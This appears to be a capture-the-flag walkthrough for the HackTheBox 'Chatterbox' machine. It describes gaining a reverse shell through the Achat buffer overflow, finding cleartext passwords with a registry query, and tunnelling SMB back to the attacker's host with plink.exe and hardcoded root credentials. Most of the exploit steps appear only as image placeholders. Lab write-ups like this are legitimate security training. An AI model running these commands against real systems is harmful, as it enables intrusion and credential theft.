Skip to content

The Chatterbox (Box 2)

Achat Exploit - https://www.exploit-db.com/exploits/36025

Achat Exploit (Metasploit) - https://www.rapid7.com/db/modules/exploit/windows/misc/achat_bof

Gaining a Foothold

image.png

image 1.png

cp /usr/share/exploitdb/exploits/windows/remote/3602.py 3.py gedit 3.py

From initial enumeration we find that Buffer Overflow is there but we need to reverse shell to append the result.

image 2.png

This is the payload but to achieve reverse shell we need to make some changes !

image 3.png

We need to run this now :

image 4.png

After this copy the buf content and try to execute it on the .py file/

image 5.png

This will help to make connection !! We have added out IP Address !!

And after executing the .py file

Boom we got the shell

image 6.png

Escalation via Stored Passwords

systeminfo

image 7.png

whoami

net users

net user alfred

ipconfig

netstart -ano

image 8.png

port 445 > SMB

arp -a

In Registery

image 9.png

reg query HKLM/f password /t REG_SZ /s

image 10.png

image 11.png

image 12.png

Remember from netstart -ano > we saw 445 smb port open.

Foe this we need to download the plink.exe 32-bit version. After that we need to create a Port Forwarding.

image 13.png

We now open port 80 on kali and on the other hand we are trying to push our exe file via the low level previlege which we have gain to the targeted system.

image 14.png

image 15.png

Now we need to make some changes in it : gedit /etc/ssh/sshd_config

image 16.png

We need to change the option for prohibit_password >

image 17.png

It will allow you to login as root.

  • After that service ssh restart
  • service ssh start

image 18.png

plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.5

image 19.png

After that we got the root access right.

image 20.png

image 21.png

Exploited Vulnerabilities in HTB Chatterbox

1. Achat Buffer Overflow – Remote Code Execution (Initial Foothold)

Vulnerability:

Achat 0.150 chat server is vulnerable to a buffer overflow when sending a specially crafted Kiss command.

What It Is:

  • A classic stack-based buffer overflow where excess data overwrites EIP (Instruction Pointer), allowing arbitrary code execution.
  • Remote unauthenticated attacker can exploit this to execute shellcode.

Already Discussed:

You:

  • Used a modified Exploit-DB script (36025.py)
  • Injected a custom reverse shell payload
  • Gained a low-privileged reverse shell

Vulnerability Type:

Remote Code Execution via Buffer Overflow (unauthenticated)

2. Registry-Stored Cleartext Passwords – Credential Disclosure (Privilege Escalation)

Vulnerability:

Windows stores sensitive configuration data (including cleartext passwords) in the registry under HKLM.

What It Is:

  • Misconfigured software or admins sometimes store plaintext passwords in registry keys.
  • Readable by authenticated low-privilege users if not secured.

Already Discussed:

You ran:

reg query HKLM /f password /t REG_SZ /s

→ Discovered a stored admin password

🔧 Vulnerability Type:

Insecure Credential StorageCleartext password disclosure in registry

3. SSH Port Forwarding via plink.exe (Access Expansion)

Vulnerability:

Using exposed credentials and SSH tunneling tools like plink.exe, a user can forward internal services (like SMB on port 445) through SSH to bypass local protections.

What It Is:

  • If SSH is configured to allow password-based root login (on Kali box), a tunnel can be created from the Windows victim back to attacker.
  • This exposes privileged internal services to the attacker's system.

Already Discussed:

You:

  • Forwarded port 445 via:
plink.exe -l root -pw toor -R 445:127.0.0.1:445 <kali-ip>
  • Gained elevated access through the tunnel

Vulnerability Type:

Abuse of Port Forwarding + Credential Reuse → Leads to SYSTEM-level access